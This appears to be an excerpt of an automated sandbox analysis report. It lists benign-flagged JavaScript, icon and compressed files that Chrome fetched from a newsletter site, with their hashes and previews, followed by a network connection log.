                                                                                                                                            Entropy (8bit):5.475069346064321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEKvNjJzEA6UizDodI+XGbohOCrx8NwKQGCBNbN60:QmJEUiIdI+dACV8CJGCN60
                                                                                                                                            MD5:5B0E783F3BE40B8E9189BE44656FF61B
                                                                                                                                            SHA1:690B0B8844330A9A8F05DB44FAEA5D42E444E817
                                                                                                                                            SHA-256:7CCFE2ADB608C7BD3691716896ECCE27E68A6863754566DC3872105EC7D57BA0
                                                                                                                                            SHA-512:75CFD087B6F4ACB797CD80F5C9F367B67894AA31606AC0808D263B434DFB71FCCA89F35B5FE74F75797462CE2C9BE227D4D090B5B47B577C71D39D7A97DCA94F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f5b8d081-4229-51d0-a06f-3cacf570872c")}catch(e){}}();.import{r as c}from"./index-D6da9p6-.js";import{u as m}from"./components-Oj2xMfGE.js";import{j as i}from"./jsx-runtime-BjG_zV1W.js";var d=(e=>(e.SIGNUP_REDIRECTS="signup_redirects",e.EMAIL="email",e))(d||{});const f=e=>e?e.replace(/ /g,"+"):"";function E(e,r){const[s,o]=c.useState(()=>{if(typeof window>"u")return r;try{const t=window.localStorage.getItem(e);return t?JSON.parse(t):r}catch(t){return console.error(t),r}});return[s,t=>{try{const n=t instanceof Function?t(s):t;o(n),typeof window<"u"&&window.localStorage.setItem(e,JSON.stringify(n))}catch(n){console.error(n)}}]}const g=()=>{const[e]=m(),[r,s]=E("email",""),o=e.get("email"),a=o||r,t=n=>{s(n)};return c.useEffect(()=>{o&&!r&&s(o),o&&r&&o!==r&&s(o)},[]),[f(a),t]},w=g,u=c
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (15680)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16040
                                                                                                                                            Entropy (8bit):5.61545851955969
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:+m5xBZ8ZJnVv6+WKZafxf8uPlxW7pVuulAYNYkPzSR:+m57Z8ZlcFf8UlxW77lAYN7zG
                                                                                                                                            MD5:4AB9D5F15C0C68BA0ADB57CF084D1494
                                                                                                                                            SHA1:BE7241EEB4D0BBDAAC3ADBFDBEF26AF7C6BDA6BA
                                                                                                                                            SHA-256:AB64D394D8DE8AFACADC6150195AA6C65825E0C26093A88F19D1F3B309335AE2
                                                                                                                                            SHA-512:81BDDF33975FDD20599207F5E7FA7B440DBA02A43693114D42B00F6AE8C5B7AE1E08085B99CD40DAA61F502C3D285950223C82535279F4E83CD328578F1EFAB3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="48665b6f-ad4d-52b5-906d-5247e5a6261e")}catch(e){}}();.import{j as b}from"./jsx-runtime-BjG_zV1W.js";import{c as le}from"./index-x2da_zcv.js";import{T as Pe,L as he,Y as ge,a as Se,F as ye,I as xe}from"./YoutubeIcon-DSouMQiN.js";import{r as a,e as $}from"./index-D6da9p6-.js";import{e as Ie,N as we,E as Ee,n as fe,y as $e,s as D}from"./use-root-containers-DmyWFwuo.js";import{O as X,U as Y,y as U,c as Te,s as de,o as I,u as H,C as q,I as z,a as A,T as ke,d as Ne,l as Me}from"./keyboard-CaEu2o0u.js";import{n as ae,y as Le,s as je,d as W,u as ve}from"./transition-y-5XFFuu.js";import{f as re,s as ne}from"./hidden-KuoXmiN5.js";import{r as me}from"./bugs-DVQzBh-s.js";import{f as ue,h as Fe,T as _e,O as G,M as R,o as Oe,N as oe}from"./use-is-mounted-BaHv16bB.js";const Be=({className:e,fil
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17174
                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, Unicode text, UTF-8 text, with very long lines (1067)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1435
                                                                                                                                            Entropy (8bit):5.595645148206734
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSH7ENY0PFUA+IyjC8FhslPFjyLudv0A+3E0/5lgag6LODALblB:JWkEnENYiFcIyjxhslPFjyKlB+3E0/5d
                                                                                                                                            MD5:3BB0B4F76B4B0B7D38940874E568C407
                                                                                                                                            SHA1:2214C748069DB288C25487D3B0F70AEAA6B35043
                                                                                                                                            SHA-256:03F19EBA847BED4600CE02AB56510117779736340F7370B137F340DB32A8F46E
                                                                                                                                            SHA-512:B2ED1CC415C64CC1BF7D265CF47B5CE4F2AA79B27BFEB3703E9BE72C906C9EA8A2C2D53649D88180B2B1E8436E281809AF62E358321680348A660BB5708714F4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e2e231bc-9fe4-5845-8bc0-5c4d667fd386")}catch(e){}}();.import{r as o}from"./index-D6da9p6-.js";const r=/&(?:amp|#38|lt|#60|gt|#62|apos|#39|quot|#34|nbsp|#160|copy|#169|reg|#174|hellip|#8230|#x2F|#47);/g,p={"&amp;":"&","&#38;":"&","&lt;":"<","&#60;":"<","&gt;":">","&#62;":">","&apos;":"'","&#39;":"'","&quot;":'"',"&#34;":'"',"&nbsp;":" ","&#160;":" ","&copy;":".","&#169;":".","&reg;":".","&#174;":".","&hellip;":".","&#8230;":".","&#x2F;":"/","&#47;":"/"},c=e=>p[e],u=e=>e.replace(r,c);let t={bindI18n:"languageChanged",bindI18nStore:"",transEmptyNodeValue:"",transSupportBasicHtmlNodes:!0,transWrapTextNodes:"",transKeepBasicHtmlNodesFor:["br","strong","i","p"],useSuspense:!0,unescape:u};function l(){let e=arguments.length>0&&arguments[0]!==void 0?arguments[0]:{};t={...t,...e}}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (46306)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):169070
                                                                                                                                            Entropy (8bit):5.3041506032822365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2LuISaNADzREMZiGPWIIvTFQtaJoGh/m7CGiARistQ0+qzCVwQVRFwzieCbqLkqh:2jSuINdYGOlwGr5Y+tyc1x07
                                                                                                                                            MD5:24C659AFE885497D457B0CC84F344C6F
                                                                                                                                            SHA1:A34DE0DF0004ABFD1DC5F859ECE003D7831396AC
                                                                                                                                            SHA-256:06A55F57BE74D334FFCF06F3889B6CDC1CF0E425A2384E552CC9E692401E575D
                                                                                                                                            SHA-512:60786C7EE9598AD275B031E2D7A7F5C7D2A1BD32CA08B098B1D73FC80F6F2938BD4A0B4198BE8C33E6DE2B60924E3C2C4817E1C005EDC02808C002F8A5C1BA44
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-IxBbnf-Q.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="eba05efb-3c74-5e66-9b9c-529ea8b88970")}catch(e){}}();.import{j as ze}from"./jsx-runtime-BjG_zV1W.js";import{c as pt,g as qi}from"./index-D6da9p6-.js";function Ui(e,t){const n={};return(e[e.length-1]===""?[...e,""]:e).join((n.padRight?" ":"")+","+(n.padLeft===!1?"":" ")).trim()}const Vi=/^[$_\p{ID_Start}][$_\u{200C}\u{200D}\p{ID_Continue}]*$/u,Wi=/^[$_\p{ID_Start}][-$_\u{200C}\u{200D}\p{ID_Continue}]*$/u,Qi={};function mt(e,t){return(Qi.jsx?Wi:Vi).test(e)}const Yi=/[ \t\n\f\r]/g;function Xi(e){return typeof e=="object"?e.type==="text"?gt(e.value):!1:gt(e)}function gt(e){return e.replace(Yi,"")===""}class We{constructor(t,n,r){this.property=t,this.normal=n,r&&(this.space=r)}}We.prototype.property={};We.prototype.normal={};We.prototype.space=null;function Sr(e,t){const n={},r={};let
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (354), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):354
                                                                                                                                            Entropy (8bit):3.987984263112697
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:IJ8FS/FvBWQUDVA1/SDQ0dW6F0rVt7DhjRmcrdQFsn3/VnnU26uUYmCBBq09dAm:IaFStpW9VA1/SHuVRDh9mcW4Vnnmudmc
                                                                                                                                            MD5:577917459898A6173AF79B56591383CB
                                                                                                                                            SHA1:EBFA9BD54E628073181651FBA8EA34D165BB3D9A
                                                                                                                                            SHA-256:6487885888C0BB5A41F8599AE9327E51CFCC3AFF32BB104A22A0960860D03432
                                                                                                                                            SHA-512:8314DB09E0651BF803582FE18F264553B0342C7FCD9DC9B324BAAFF457C5A7BA3D8DEC745DF82E2713DA0268CAE6EE72D2575AF5BEFA296A8468E4BB6E4EF47E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://stk.px-cloud.net/ns?c=96b30ca0-d36c-11ef-9184-6f26b2b3f904
                                                                                                                                            Preview:582df6f5d908bf66c71c7b6d6a8cb95933ab9776edfab515f9ff103d17bac59c0e9aa0935d16c77e3020685f54783a85020073e878c3bce97a8d2d9344c5bc5ed5b090aae597b0666c6fc89140bac1845d5b2cd443ef2da0e49fd861533fe9296450e18878e2b48924c6fa5a440c7604d6dc9a73c58b1351b2c00eb8cb53cc6825e2d7a3c9fc7529244d11c0370a62ffa1513f04a4c08057d38f2917e2e2e96e4efac246ce5cbd6641d9b7ae62e4972a12
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):49954
                                                                                                                                            Entropy (8bit):7.99493321471063
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                                                                                                            MD5:E16AC075AC754DBD1CF969508220E30D
                                                                                                                                            SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                                                                                                            SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                                                                                                            SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js
                                                                                                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (2103)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2472
                                                                                                                                            Entropy (8bit):5.345768973919404
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEtNHe0drPVl3V2grSPEAjk1A8r+3Nwdxkdy:QXBtf2grqEAj42dy
                                                                                                                                            MD5:48D8EC3A35C0DA31F927633FE678C8AA
                                                                                                                                            SHA1:6801A82D26C8CFB31E55DCC8D32E22E9E4D5592B
                                                                                                                                            SHA-256:C6360201E48DA96CEFE1D83EEC98144BDDC02ECE5A196DB4219D4EBE1CAB6342
                                                                                                                                            SHA-512:901208323EACA0D231B7D5696DFFA866A6D80CC3D59D539C4FA1C8BED82E9BB72AC769309848C39BFD92D8641C9934943623BE9490E110798B6FC753703EF2C4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0f25245c-76dc-5111-b8b6-22c1fda64748")}catch(e){}}();.import{j as s}from"./jsx-runtime-BjG_zV1W.js";import{c as o}from"./index-x2da_zcv.js";import{S as u,a as g}from"./CreateAction-Dl0JjCOR.js";import{T as t}from"./index-BdpAPpdN.js";import{d as p,L as n}from"./components-Oj2xMfGE.js";import{u as f}from"./useTranslation-CfKJAmGY.js";import{F as y}from"./LockClosedIcon-BluoCUMI.js";const v=({title:l,message:c,cta:i,publication:a,theme:e,createActionType:x=g.GATED})=>{const{signupWidgetConfigs:b}=p("root"),{t:r}=f(),d=a.web_template.web_theme.color_background,m=a.web_template.web_theme.color_body;return s.jsxs("div",{className:o("mx-auto flex w-full flex-col items-center px-10",{"mb-10 bg-wt-text-on-background py-10 text-wt-background":e==="subscribe-gate"},{"max-w-xl bg-transparen
                                                                                                                                            No static file info
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Jan 15, 2025 19:14:27.818672895 CET49673443192.168.2.16204.79.197.203
                                                                                                                                            Jan 15, 2025 19:14:28.122287989 CET49673443192.168.2.16204.79.197.203
                                                                                                                                            Jan 15, 2025 19:14:28.730396986 CET49673443192.168.2.16204.79.197.203
                                                                                                                                            Jan 15, 2025 19:14:29.938343048 CET49673443192.168.2.16204.79.197.203
                                                                                                                                            Jan 15, 2025 19:14:30.221966982 CET49708443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.222002029 CET44349708104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.222060919 CET49708443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.222486019 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.222573996 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.222655058 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.222690105 CET49708443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.222706079 CET44349708104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.222889900 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.222922087 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.607577085 CET4968980192.168.2.16192.229.211.108
                                                                                                                                            Jan 15, 2025 19:14:30.700129986 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.700485945 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.700547934 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.701100111 CET44349708104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.701765060 CET49708443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.701783895 CET44349708104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.701812029 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.702013016 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.705641031 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.705673933 CET44349708104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.705741882 CET49708443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.705758095 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.705847025 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.705881119 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.706152916 CET49708443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.706403971 CET44349708104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.747287989 CET49708443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.747298956 CET44349708104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.747359991 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:30.795300007 CET49708443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.873317003 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.873446941 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.873533964 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.873631954 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.873743057 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.873766899 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.873796940 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.873862028 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.873862028 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.873922110 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.874022961 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.874109030 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.874304056 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.874367952 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.877641916 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.877772093 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.877810955 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.877837896 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.877865076 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.877883911 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.878175974 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.878201962 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.878226995 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.878227949 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.878252029 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.878277063 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.879089117 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.879112959 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.879134893 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.879153967 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.879160881 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.879160881 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.879179955 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.879209042 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.879933119 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.879952908 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.879976034 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.879996061 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.880012989 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.880034924 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.880059958 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.880714893 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.880739927 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.880763054 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.880779982 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.880779982 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.880796909 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.881644964 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.881684065 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.881704092 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.884886980 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.884903908 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.888465881 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.888506889 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.888582945 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.890222073 CET49711443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.890275002 CET44349711104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.890350103 CET49711443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.892229080 CET49712443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.892268896 CET44349712104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.892329931 CET49712443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.892594099 CET49708443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.892818928 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.892827988 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.893546104 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.893635988 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.893759012 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.894459963 CET49711443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.894498110 CET44349711104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.895255089 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.895370960 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.895452976 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.895533085 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.895592928 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.895593882 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.895626068 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.895652056 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.895709038 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.895745993 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.895807028 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.895834923 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.895904064 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.895953894 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.896006107 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.896045923 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.896071911 CET49712443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.896089077 CET44349712104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.896117926 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.896147013 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.896207094 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.896223068 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.896291971 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.896325111 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.896389961 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.896701097 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.896771908 CET49709443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:31.896795988 CET44349709104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.896862984 CET49709443192.168.2.16104.18.69.40
